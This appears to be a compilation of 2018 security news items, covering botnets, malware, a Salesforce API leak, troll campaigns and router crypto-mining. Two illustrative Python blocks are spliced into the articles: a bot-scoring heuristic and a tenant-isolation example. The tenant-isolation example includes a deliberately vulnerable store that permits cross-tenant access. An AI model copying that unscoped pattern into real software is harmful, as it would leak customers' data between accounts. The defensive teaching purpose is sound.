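def is_likely_bot(features, threshold=3):
    return bot_score(features) >= threshold


# Constructed sample 1: a scam-style account posting the same tagged link every 30 min.
BOT_USER = {"screen_name": "crypto_giveaway8824", "created_at": NOW - timedelta(days=10),
            "followers": 12, "following": 900, "likes": 5}
BOT_TWEETS = [{"created_at": NOW - timedelta(minutes=30 * i),
               "text": "Send 0.1 ETH get 1 ETH back! @elonmusk http://example.invalid/claim"}
              for i in range(40)]

# Constructed sample 2: an ordinary account with varied, sporadic posts.
HUMAN_USER = {"screen_name": "jane_doe", "created_at": NOW - timedelta(days=1095),
              "followers": 300, "following": 280, "likes": 4000}
HUMAN_TWEETS = [{"created_at": NOW - timedelta(days=d, hours=h), "text": txt} for d, h, txt in [
    (0, 2, "Coffee then the long run along the river."),
    (1, 5, "Anyone read the new paper on bot detection? https://example.invalid/paper"),
    (2, 1, "Sourdough attempt #3: better crumb, still flat."),
    (4, 8, "@a_friend see you at the meetup on Thursday"),
    (6, 3, "Rain again."),
    (9, 7, "Finally cleaned the garage."),
]]

if __name__ == "__main__":
    for name, user, tweets in (("bot", BOT_USER, BOT_TWEETS), ("human", HUMAN_USER, HUMAN_TWEETS)):
        f = account_features(user, tweets)
        print(name, bot_score(f), is_likely_bot(f))
```

The per-feature thresholds are deliberately crude; the value of the approach is that each feature is cheap to compute from public profile and timeline data, and an account that trips several of them at once is worth a closer look even if no single feature is conclusive.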

Tests conducted by experts led to the discovery of a sophisticated cryptocurrency-related scam botnet powered by at least 15,000 bots. These accounts were designed to use deceptive behaviors to avoid automatic detection, while attempting to obtain money from users by spoofing cryptocurrency exchanges, celebrities and news organizations.

Duo Security informed Twitter of its findings. The social media giant says it’s aware of the problem and claims it’s proactively implementing mechanisms to detect problematic accounts.

“Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections. When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter's API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related,” Twitter said.

Duo Security has published a 46-page research paper describing its findings and techniques. The company will release its tools as open source on August 8 at the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” explained Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”

Mozilla to Researchers: Stay Away From User Data and We Won’t Sue
6.8.2018 securityweek  Security

Security researchers looking to find bugs in Firefox should not worry about Mozilla suing them, the Internet organization says. That is, of course, as long as they don’t mess with user data.

Mozilla, which has had a security bug bounty program for over a decade, is unhappy with how legal issues interfere with the bug hunting process and has decided to change its bug bounty program policies to mitigate that.

Because legal protections afforded to those participating in bounty programs failed to evolve, security researchers are often at risk, and the organization is determined to offer a safe harbor to those researchers seeking bugs in its web browser.

According to the Internet organization, bug bounty participants could end up punished for their activities under the Computer Fraud and Abuse Act (CFAA), the anti-hacking law that criminalizes unauthorized access to computer systems.

“We often hear of researchers who are concerned that companies or governments may take legal actions against them for their legitimate security research. […] The policy changes we are making today are intended to create greater clarity for our own bounty program and to remove this legal risk for researchers participating in good faith,” Mozilla says.

For that, the browser maker is making two changes to its policy. On the one hand, the organization has clarified what is in scope for its bug bounty program, while on the other it has reassured researchers it won’t take legal action against them if they don’t break the rules.

Now, Mozilla makes it clear that participants to its bug bounty program “should not access, modify, delete, or store our users’ data.” The organization also says that it “will not threaten or bring any legal action against anyone who makes a good faith effort to comply with our bug bounty program.”

Basically, the browser maker says it won’t sue researchers under any law (the DMCA and CFAA included) or under its applicable Terms of Service and Acceptable Use Policy for their research performed as part of the bug bounty program.

“We consider that security research to be ‘authorized’ under the CFAA,” Mozilla says.

These changes, which are available in full in the General Eligibility and Safe Harbor sections of the organization’s main bounty page, should help researchers know what to expect from Mozilla.

Fortnite APK is coming soon, but it will not be available on the Google Play Store
6.8.2018 securityaffairs Android

Fortnite, the most popular game of the moment, will soon be available to Android users, but the Fortnite APK will not be in the Play Store.
Fortnite continues to be the most popular game; it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The great success of Fortnite has attracted cyber criminals who are attempting to exploit its popularity to target its fans.

Unfortunately for Android users, Fortnite for Android is not available yet; it is currently under development, while the iOS version was released in March by Epic Games.

In recent months, crooks have attempted to take advantage of Android users’ interest in an alleged version of the popular game for their devices.

Experts discovered many blog posts and video tutorials with instructions to install a fake Fortnite Android app.

Scammers are exploiting this interest to trick Android fans into downloading tainted versions of the game that can compromise their devices.

Fortnite APK

Now there is news for the Android fans of the popular game: Epic Games confirmed that the Fortnite APK for Android will be available for download exclusively through its official website and not through the official Google Play Store.

According to Epic Games CEO Tim Sweeney, in this way the company will “have a direct relationship” with its consumers and will save the 30 percent fee that Google retains when users download software from the Play Store.

“The awesome thing about Fortnite is it’s brought a huge volume of digital commerce to Epic. We can now do that very efficiently. We can handle payment processing and customer support and download bandwidth with some great deals. We’re passing the savings along with the Unreal Engine Marketplace. We’ve changed the royalty split from the 30/70 you see everywhere to developers getting 88 percent. We find that’s a great boon for developers,” Sweeney told GamesBeat.

Sweeney explained that the share of profits taken on the versions running on Microsoft or Nintendo platforms is justified by the “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Sweeney considers the 30% cut applied by Google for its services disproportionate, but evidently does not weigh the security features implemented by the Google store to prevent crooks from serving tainted versions of the Fortnite APK.

Even though several malicious apps have been found uploaded to the Play Store in the past, Google’s efforts to protect its users cannot be underestimated.

The availability of Fortnite APK on a third-party website could expose Android users to the risk of infection.

The only way to install an APK obtained from a third-party site is to manually enable the “Install Apps from Unknown Sources” option in the settings.

A large number of Android users will search for “how to install Fortnite on Android,” and these fans could be targeted in various ways, for example by black SEO campaigns devised to infect their devices.

“The move will simply encourage users to manually enable “Install Apps from Unknown Sources” option in the settings menu or accept a variety of Android security prompts in order to install Fortnite game directly from the Epic Games website.” reported The Hacker News.

“So, thousands of people out there searching, “how to install Fortnite on Android” or “how to download Fortnite APK for Android” on the Internet, could land themselves on unofficial websites, ending up installing malware.”

In order to install Fortnite on Android, players will have to download the Fortnite Launcher from the official Epic website, which will then allow them to load Fortnite Battle Royale onto their devices.

Attackers can impersonate the legitimate source, for example by carrying out phishing campaigns to trick Android users into downloading a tainted version of the Fortnite APK.

Chip Giant TSMC Says WannaCry Behind Production Halt
6.8.2018 securityweek

TSMC Chip Factory hit by Malware

Image Source: Taiwan Semiconductor Manufacturing Co., Ltd.

Chipmaker giant Taiwan Semiconductor Manufacturing Co (TSMC) said Monday the computer virus that brought its production to a halt for two days was a variant of the WannaCry ransomware that hit users all around the world.

WannaCry infected more than 200,000 users in more than 150 countries last year, encrypting user files and demanding ransom payments from their owners to get them back.

TSMC -- a key Apple supplier -- said some of its computer systems and equipment in its Taiwan plants were infected on August 3 during software installation, which is expected to cause shipment delays and cut third-quarter revenue by two percent.

It comes as Apple is set to release new iPhone models later this year.

TSMC declined to specify which customers and products are affected by the brief outage, but it said no confidential information was compromised.

Chief Executive Officer C.C. Wei told reporters and analysts on Monday that the virus has been eliminated and all production is back online.

Wei ruled out a hack targeted at the company, attributing the incident instead to an oversight by employees who failed to conduct virus scans properly.

"This is purely our negligence so I don't think there is any hacking behaviour," he said.

"We regret this. There won't be any more human errors," said Wei.

He added that TSMC will develop a more automated anti-virus procedure going forward.

The firm said it is in close contact with its customers to minimise the impact, and maintains its sales growth outlook for the year.

Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
6.8.2018 securityaffairs Attack

DoE announced the Liberty Eclipse exercise to test the electrical grid’s ability to recover from a blackout caused by cyberattacks.
This is the first time the Department of Energy will test the electrical grid’s ability to recover from a blackout caused by cyberattacks.

We have discussed many times the effects of a cyber attack against an electrical grid; the most frightening scenario sees a wide power outage leaving the population in the dark.

Is this a feasible scenario for the US critical infrastructure?

The Department of Energy wants to test the resilience of the electrical grid to a cyber attack, so it is going to launch the first hands-on exercise to test the ability of infrastructure operators to recover from a blackout caused by a cyber attack.

According to the E&E News website, the Department of Energy plans to conduct a weeklong experiment, dubbed ‘Liberty Eclipse,’ that will take place starting Nov. 1 on a restricted area off the coast of New York called Plum Island.

“The Department of Energy is planning an unprecedented, “hands-on” test of the grid’s ability to bounce back from a blackout caused by hackers, E&E News has learned.” reported the E&E News website.

“The “Liberty Eclipse” exercise will simulate the painstaking process of re-energizing the power grid while squaring off against a simultaneous cyberattack on electric, oil and natural gas infrastructure. The weeklong stress test is scheduled to take place this November on Plum Island, a restricted site off the coast of New York that houses a Department of Homeland Security animal disease center.”

This is the first time that the Department of Energy is planning such a “hands-on” test of the grid’s ability to restore operations after a blackout caused by a cyber attack. The “Liberty Eclipse” exercise aims at evaluating the response of the infrastructure to coordinated attacks against electric, oil and natural gas infrastructure. The DOE wants to prepare the country’s infrastructure for these threats.

“It’s in our national security interest to continue to protect these sources of energy and to deliver them around the world,” Energy Secretary Rick Perry said at a cybersecurity conference in New York last week.

“Taking care of that infrastructure, from the standpoint of protecting it from cyberattacks — I don’t think it’s ever been more important than it is today.”

electrical grid

The goal of the Liberty Eclipse exercise is to prepare the response to a major incident caused by cyber attacks, events that could become frequent in the near future. Utilities that have to restore electricity following massive blackouts first need an initial jump of electricity before they can start generating it.

Operators do this by using diesel generators and other blackstart sources to choreograph “cranking paths” for restoring the functions of the electrical grid.

“Utilities can’t just flip a few switches to bring the lights on following a major shutdown. In fact, power plants typically need an initial jump of electricity before they can start generating it.” continues the E&E News website. “Power companies rely on diesel generators and other blackstart sources to choreograph “cranking paths” for bringing the grid on its feet. Once enough pockets of electricity have been brought online, operators can sync up the islands with the wider grid.”

The entire process is time-consuming and can take many hours to be completed, even under the most favorable circumstances.

The DOE aims to speed up the restoration of the electrical grid by incorporating simulated cranking paths, provided by the Defense Advanced Research Projects Agency, that were designed for this purpose.

“Together, [participants] will work to energize a blackstart cranking path by detecting the attack, cleaning malicious influence, and restoring crank path digital systems to operation,” the DOE states in a planning memo from last month.

This is the first exercise that will test the “blackstart” cranking paths, which were excluded from previous simulations.

TCM Bank: website misconfiguration exposed applicant data for 16 months
6.8.2018 securityaffairs Hacking

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, between early March 2017 and mid-July 2018
TCM Bank, a subsidiary of ICBA Bancard, serves as a trusted advisor to community banks and as a direct issuer of credit cards for more than 750 small and community U.S. banks that prefer not to issue cards themselves.

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, including names, addresses, dates of birth and Social Security numbers.

“In a letter being mailed to affected customers today, TCM said the information exposed was data that card applicants uploaded to a Web site managed by a third party vendor.” wrote the popular investigator Brian Krebs.

“TCM said it learned of the issue on July 16, 2018, and had the problem fixed by the following day.”

Thousands of people who applied for cards between early March 2017 and mid-July 2018 were affected by the incident.

The company notified affected customers of the incident via email; the exposed data belongs to card applicants and was uploaded to a Web site managed by a third-party vendor.

The attorney Bruce Radke who is helping TCM confirmed that the number of affected customers is less than 10,000.

“It was less than 25 percent of the applications we processed during the relevant time period that were potentially affected, and less than one percent of our cardholder base was affected here,” Radke said.

“We’ve since confirmed the issue has been corrected, and we’re requiring the vendor to look at their technologies and procedures to detect and prevent similar issues going forward.”

TCM Bank

Businesses have to carefully review the level of security implemented by their partners, so that third-party incidents do not have a significant impact on their operations.

“Many companies that experience a data breach or data leak are quick to place blame for the incident on a third-party that mishandled sensitive information. Sometimes this blame is entirely warranted, but more often such claims ring hollow in the ears of those affected — particularly when they come from banks and security providers.” concludes Krebs.

“Managing third-party risk can be challenging, especially for organizations with hundreds or thousands of partners”

ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
6.8.2018 securityaffairs Cryptocurrency

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.
The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.

The expert called the new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first DLL; it uses several exploits to spread.

Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.

The miner uses the Simplified Chinese language, which suggests that its author is a Chinese coder.

The ZombieBoy miner leverages several exploits, including:

CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003
CVE-2017-0143, SMB exploit
CVE-2017-0146, SMB exploit
ZombieBoy also uses both the NSA-linked DoublePulsar and EternalBlue exploits to remotely install the main DLL. The malware uses ZombieBoyTools to install the two exploits.

Once the malware has established a backdoor on the target system, it could deliver other families of malware, such as ransomware and keyloggers.

According to Quinn, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor and an RDP backdoor.

The same component uses XMRIG to mine Monero coins at 43 KH/s, which means the attackers can earn roughly $1,000 per month at the current rate.

“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn highlighted that the miner is being updated constantly; he is observing new samples on a daily basis.

The malware is able to detect virtual machines and does not run in a virtualized environment, to make its detection harder.

Further details including IoCs are reported in the analysis published by the expert.

Tech Support Scams improved with adoption of Call Optimization Service
6.8.2018 securityaffairs

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.
Crooks are improving their tech support scams by using Call Optimization Services, which are commonly used in legitimate call center operations for:

Tracking the source of inbound calls
Creation and management of phone numbers
Call load balancing
Call forwarding
Call analytics
Call routing
Call recording
Scammers continue to improve their techniques, and now they are using the service to dynamically insert phone numbers into their scam web pages, potentially gaining additional features that make their scams more successful.

The scams begin when unwitting victims visit a malicious website or are redirected to a bogus website in various ways, such as through a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

tech support scams

The malicious page implements some tricks to prevent victims from closing it: it displays notification dialogs in full-screen mode or executes a JavaScript routine that makes the site unresponsive.
The page displays a list of numbers to call to fix the problem, and users in panic tend to call them.

According to Symantec, crooks leverage call optimization services in order to dynamically insert phone numbers into a scam page.

This specific tech support scam not only performs browser fingerprinting, it also retrieves the browser version, based on which crooks redirect victims to different scam pages.

Crooks used a script from the call optimization service to check for a specific tag in the scam URL; the script then retrieves the scammer’s phone number from the service’s servers. When the servers return the scammer’s phone number, the tag triggers the “Callback” function that retrieves and displays the appropriate phone number for victims to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is retrieved by loading an XML file using the function loadXMLDoc(), and is then displayed on the scam page.

The advantage of using the call optimization service’s tag in the URL is that it allows the scammers to dynamically insert “localized” phone numbers into their scam pages, that is, a different number depending on the victim’s country.
Victims are shown a phone number that connects them to someone who speaks their language.
“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec.

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can abuse Call Optimization Services in their tech support scams for other goals too, for example to obtain call analytics or to implement load balancing during busy times so that no calls are lost.

Malware Hits Plants of Chip Giant TSMC
6.8.2018 securityweek

A piece of malware has caused significant disruptions in the factories of Taiwan Semiconductor Manufacturing Company (TSMC), the world’s biggest contract chipmaker.

TSMC’s most important customer is Apple, whose iPhone and iPad products use TSMC chips, but the company also supplies semiconductors to Qualcomm, Nvidia, AMD, MediaTek and Broadcom.

In a statement published on its website on Sunday, the company described the incident as a “computer virus outbreak” that impacted an unspecified number of computer systems and fabrication tools in Taiwan.

The infection was discovered on August 3 and the semiconductor foundry said it had restored 80 percent of systems by August 5, with a full recovery expected by August 6.

The company expects the incident to have a significant impact on its revenue for the third quarter. Financial Times reported that its revenue will take a hit of roughly $255 million.

“TSMC expects this incident to cause shipment delays and additional costs. We estimate the impact to third quarter revenue to be about three percent, and impact to gross margin to be about one percentage point. The Company is confident shipments delayed in third quarter will be recovered in the fourth quarter 2018, and maintains its forecast of high single-digit revenue growth for 2018 in U.S. dollars given on July 19, 2018,” TSMC stated.

“Most of TSMC’s customers have been notified of this event, and the Company is working closely with customers on their wafer delivery schedule. The details will be communicated with each customer individually over the next few days,” the company added.

According to TSMC, the malware made its way onto the network due to “misoperation” during the installation of a new tool. The company said the incident did not affect data integrity and it did not result in confidential information getting compromised.

Salesforce warns of API error that exposed Marketing data
5.8.2018 securityweek

The US Cloud-based customer relationship management software giant Salesforce is warning marketing customers of a data leakage caused by an API error.
The US cloud computing company Salesforce is warning marketing customers of a data leakage caused by an API error. The incident could potentially affect a large number of companies, including Aldo, Dunkin Donuts, GE, HauteLook, Nestle Waters, and Sony.

The error was in production from June 4 to July 18, and potentially affected users of two modules within the broader Marketing Cloud offering, the Email Studio and Predictive Intelligence solutions.

“On July 18, we became aware of an issue that impacted a subset of Marketing Cloud customers using Marketing Cloud Email Studio and Predictive Intelligence.” reads the notice published by Salesforce.

“We resolved the issue on that same day, July 18. Customers who may have been impacted were notified. For additional details, please see the Email Studio and Predictive Intelligence REST API Issue article here: https://sfdc.co/XIbG2”

salesforce marketing-cloud

The news was first reported by BankInfoSecurity that obtained a copy of the alert distributed by the company via email on Thursday.

Salesforce states that the error involved the company’s REST application programming interface.

“During a Marketing Cloud release between June 4, 2018, and July 7, a code change was introduced that, in rare cases, could have caused REST API calls to retrieve or write data from one customer’s account to another inadvertently,” reads the alert issued by Salesforce and published by BankInfoSecurity.

“Where the issue occurred, the API call may have failed and generated an error message rather than writing or modifying data.”
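The defect class Salesforce describes, an API call that reads or writes one customer’s data from another customer’s session, is a tenant-isolation failure. The block below is an added example, not Salesforce code and not a description of the actual Marketing Cloud defect (whose details are not public): it contrasts a store that looks records up by id alone with one whose key includes the tenant, and adds the kind of access-log review a customer told to “monitor and review your data carefully” might run. Record shape, account ids and the log entries are assumptions.

```python
"""Tenant scoping in a multi-tenant record API: vulnerable and hardened forms.

Added example, not Salesforce code. The store layout, account ids and the
sample access log are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Record:
    record_id: str
    account_id: str  # owning tenant
    subject: str


class UnscopedStore:
    """Vulnerable pattern: rows keyed by record id alone. The caller's tenant
    is accepted but never used, so any valid id returns (or overwrites) the row."""

    def __init__(self) -> None:
        self._rows: Dict[str, Record] = {}

    def put(self, rec: Record) -> None:
        self._rows[rec.record_id] = rec

    def get(self, caller_account: str, record_id: str) -> Optional[Record]:
        return self._rows.get(record_id)  # caller_account ignored

    def update_subject(self, caller_account: str, record_id: str, subject: str) -> Optional[Record]:
        rec = self._rows.get(record_id)
        if rec is None:
            return None
        rec.subject = subject  # cross-tenant write goes through
        return rec


class ScopedStore:
    """Hardened pattern: the tenant is part of the primary key, so a lookup can
    only ever return the caller's own rows and writes reuse the same path."""

    def __init__(self) -> None:
        self._rows: Dict[Tuple[str, str], Record] = {}

    def put(self, rec: Record) -> None:
        self._rows[(rec.account_id, rec.record_id)] = rec

    def get(self, caller_account: str, record_id: str) -> Optional[Record]:
        return self._rows.get((caller_account, record_id))

    def update_subject(self, caller_account: str, record_id: str, subject: str) -> Optional[Record]:
        rec = self.get(caller_account, record_id)
        if rec is None:
            return None
        rec.subject = subject
        return rec


def handle_get(store, caller_account: str, record_id: str) -> Tuple[int, Optional[dict]]:
    """REST-style read. A miss and a foreign row both answer 404, so the API
    does not reveal whether another tenant's id exists."""
    rec = store.get(caller_account, record_id)
    if rec is None:
        return 404, None
    return 200, {"id": rec.record_id, "account": rec.account_id, "subject": rec.subject}


def seed(store):
    """Two tenants, one record each (constructed sample data)."""
    store.put(Record("email-1001", "acct-A", "A: August newsletter"))
    store.put(Record("email-2001", "acct-B", "B: product launch"))
    return store


def find_cross_tenant_accesses(owner_of: Dict[str, str],
                               access_log: List[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """Review aid: given record -> owner and (caller, record_id, verb) entries,
    return the entries where a caller touched a row owned by another tenant."""
    return [entry for entry in access_log
            if owner_of.get(entry[1]) is not None and owner_of[entry[1]] != entry[0]]


# Constructed access log (assumption): A reads its own row, then B's row.
OWNERS = {"email-1001": "acct-A", "email-2001": "acct-B"}
ACCESS_LOG = [("acct-A", "email-1001", "GET"),
              ("acct-A", "email-2001", "GET"),
              ("acct-B", "email-2001", "PUT")]

if __name__ == "__main__":
    print("unscoped:", handle_get(seed(UnscopedStore()), "acct-A", "email-2001"))
    print("scoped:  ", handle_get(seed(ScopedStore()), "acct-A", "email-2001"))
    print("suspect: ", find_cross_tenant_accesses(OWNERS, ACCESS_LOG))
```

Keying on the tenant rather than bolting a check onto each handler is the point: a later code change that adds a new read or write path cannot forget the tenant, because the store has no way to address a row without it.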

The company also warns that some customers may have had their data corrupted; it has also posted a knowledge article on the issue.

The bad news for the company’s customers is that, at the moment, it is not able to say whether data was altered or whether attackers maliciously tampered with it.

“We have no evidence of malicious behavior associated with this issue,” a Salesforce spokesman told ISMG.

“We are unable to confirm if your data was viewed or modified by another customer,” Salesforce explained in its alert, noting that it was notifying all customers just to be on the safe side. “While Salesforce continues to conduct additional quality checks and testing in relation to this issue, we recommend that you monitor and review your data carefully to ensure the accuracy of your account.”

Do Businesses Know When They’re Using Unethical Data?
5.8.2018 securityweek Security

Data breaches are costly for the businesses that experience them; the stolen data fuels black markets and is sometimes offered to companies as legitimate data.
Data breaches are extraordinarily costly for businesses that experience them, both concerning reputational damage and money spent to repair the issues associated with those fiascos. And, on the consumer side of things, the scary thing is hackers don’t just steal data for notoriety. They do it to profit, typically by selling the snatched details online.

But, then, are other businesses aware of times when the data they just bought might have been stolen instead of legally obtained?

People Can Access Most of the Relevant Black Market Sites on Standard Browsers
There was a time when venturing into the world of the online black market typically meant downloading encryption software that hid the identity of users. However, most black market transactions happen on the “open” web so that it’s possible to access the respective sites via browsers like Firefox and Chrome without downloading special software first.

That means business representatives aren’t safe from coming across stolen data if they decide only to browse the internet normally. However, the kind of information advertised on the open web should be enough to raise eyebrows by itself. It often contains credit card information or sensitive medical details — not merely names, email addresses or phone numbers.

Companies can reduce the chances of unknowingly benefiting from stolen data by not proceeding with purchases if they contain private, not readily obtainable details.

Illegitimate Sellers Avoid Giving Payment Details
Even when people seek to profit by peddling stolen data, their desire to make money typically isn’t stronger than their need to remain anonymous. Most criminals who deal with data from illegal sources don’t reveal their names even when seeking payment. They’ll often request money through means that allow keeping their identities secret, such as Bitcoin.

Less Information, More Suspicion
If companies encounter data sellers that stay very secretive about how they get their data and whether it is in compliance with data protection and sharing standards, those are red flags.

However, even when data providers do list information about how they obtain data, it’s a good idea to validate the data on your own. For example, if you get calling data from a third-party provider, you should always check it against current Do Not Call lists.

Dark Web Monitoring Services Exist
As mentioned above, stolen data frequently works its way through the open web rather than the dark web. However, it’s still advisable for companies to utilize monitoring services that search the dark web for stolen data. The market for such information is lucrative, and some clients pay as much as $150,000 annually for such screening measures. If businesses provide data that comes up as originating from the dark web, that’s a strong indicator that it came from unethical sources.

data breaches

Do Legitimate Companies Create the Demand for Stolen Data?
It’s difficult to quantify how many reputable companies might be purchasing stolen data. If they do it knowingly, such a practice breaks the law. And, even if it happens without their knowledge, that’s still a poor reflection on those responsible. It means they didn’t carefully check data sources and sellers before going through with a purchase.

Unfortunately, analysts believe it happens frequently. After data breaches occur, some of the affected companies discover their data being sold online and buy it back. When hackers realize even those who initially had the data seized will pay for it, they realize there’s a demand for their criminal actions.

After suffering data breaches, some companies even ask their own employees to find stolen data and buy it back.

Most use intermediary parties, though representatives at major companies, including PayPal, acknowledge that this process of compensating hackers for the data they took occurs regularly. They say it’s part of the various actions that happen to protect customers — or to prevent them from knowing breaches happened at all.

If companies can find and recover their stolen data quickly enough, customers might never realize hackers had their details. That’s especially likely, since affected parties often don’t hear about breaches until months after companies do, giving those entities ample time to locate data and offer hackers a price for it.

Plus, it’s important to remember that companies pay tens of thousands of dollars to recover their data after ransomware attacks, too.

Should Businesses Bear the Blame?
When companies buy data that’s new to them, they should engage in the preventative measures above to verify its sources and check that it’s not stolen. Also, although businesses justify buying compromised data back from hackers, they have to remember that by doing so, they are stimulating demand — and that makes them partially to blame.

Instead of spending money to retrieve data that hackers take, those dollars would be better spent cracking down on the vulnerabilities that allow breaches to happen so frequently.

Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.2018 securityweek BigBrothers

The Russian shadow behind the attack on Italian President Mattarella, a coordinated attack via Twitter involved hundreds of profiles inviting him to resign.
Cybersecurity experts and Italian media believe that the Italian President Sergio Mattarella is the latest victim of the Russian troll farm.

In the late afternoon of May 27, thousands of Twitter profiles suddenly started spreading messages against the Italian president, asking him to resign.

The messages had the look of a coordinated attack: they used the hashtag #MattarellaDimettiti (Italian for “Mattarella resign”). Messages carrying this hashtag spread rapidly across the Internet, many legitimate users picked it up, and it is still quite easy to find similar legitimate messages today.

But someone triggered the online protest, someone with a clear interest in destabilizing the Italian government.

The current deputy prime minister, Luigi Di Maio, was asking for the indictment of President Mattarella, who had refused to endorse a candidate for Minister of Economy because of his known anti-euro position.

Analysis of Twitter activity revealed an anomalous spike in the number of messages against President Mattarella at around two o’clock in the morning.


Were they sleepless Italians, or was someone attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes about 400 new profiles appeared, all traced back to a single origin coordinating the misinformation campaign.

The Huffington Post reported that Italian law enforcement (Polizia Postale) confirmed that the campaign had a single source, but that the countermeasures adopted by the attackers made it impossible to locate the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved,” states the Huffington Post, citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty of the Twitter profiles involved in the attack against Italian President Mattarella belonged to completely unsuspecting Italians and had been used one or more times by the Internet Research Agency (IRA) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample comprising 67% of the archive of Internet Research Agency (IRA) activity published by the FiveThirtyEight website.

The website published 3 million Russian troll tweets that were analyzed by US prosecutor Robert Mueller as part of the investigation into Russian influence on the 2016 presidential election.

The huge number of tweets was collected by researchers Darren Linvill and Patrick Warren of Clemson University.

The archive includes roughly 16,000 tweets in Italian; according to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration: the online propaganda attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely as part of a wider diversionary strategy.

By involving more sophisticated technologies it is possible to obtain better results; think of the involvement of artificial intelligence.

Putin has said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than the current ones.

Is the Internet Research Agency itself the product of a bigger troll farm that already leverages artificial intelligence?

Malware paralyzed TSMC plants where Apple’s devices are also produced
5.8.2018 securityweek

A virus infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, in the plants where Apple’s devices are produced.
Malware infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants of the iPhone chipmaker.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

According to Bloomberg, which first reported the news, the infection caused one of the most severe disruptions the company has suffered as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants will not be able to restart before Sunday.
“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states Bloomberg.

“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.

This is the first time malware has crippled a TSMC facility and halted production; according to the company, “the degree of infection varied from factory to factory.”
“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.


The economic impact of this kind of incident could be severe; at the moment there is no information about the losses caused by the attack on the Taiwanese firm.

At the moment it is not possible to estimate the potential effects on the production of Apple devices, and “the implications are also unclear for Apple.”

“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.

“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent.”

MikroTik Routers Exploited in Massive Crypto-Mining Campaign
4.8.2018 securityweek  Exploit  Cryptocurrency

Attackers managed to infect tens of thousands of MikroTik network routers in Brazil with code that injects the CoinHive in-browser crypto-mining script into web traffic.

The attack emerged on July 31, when more than 70,000 MikroTik devices in the country started displaying the same behavior. With all using the same CoinHive site-key, it became apparent that a single actor was behind the attack.

No zero-day was used in this massive attack, as MikroTik, a Latvian router manufacturer, patched the targeted vulnerability back in April 2018. The issue, however, is that the vulnerable devices haven’t been updated in a timely manner.

At the moment, there are “hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave’s Simon Kenin, the researcher who analyzed the attack, reveals.

The employed exploit provides the attacker with the ability to read files from a vulnerable MikroTik router and get unauthenticated remote admin access to the device.

As part of this attack, however, the actor didn’t run a malicious executable on the router, but leveraged the device’s functionality to inject the CoinHive script into every web page the user visited.

For that, the attacker created a custom error page with the CoinHive script in it, which resulted in the user landing on that page when encountering any kind of error page while browsing. The attack works in both directions, meaning that users who visit websites behind those infected routers are impacted as well.

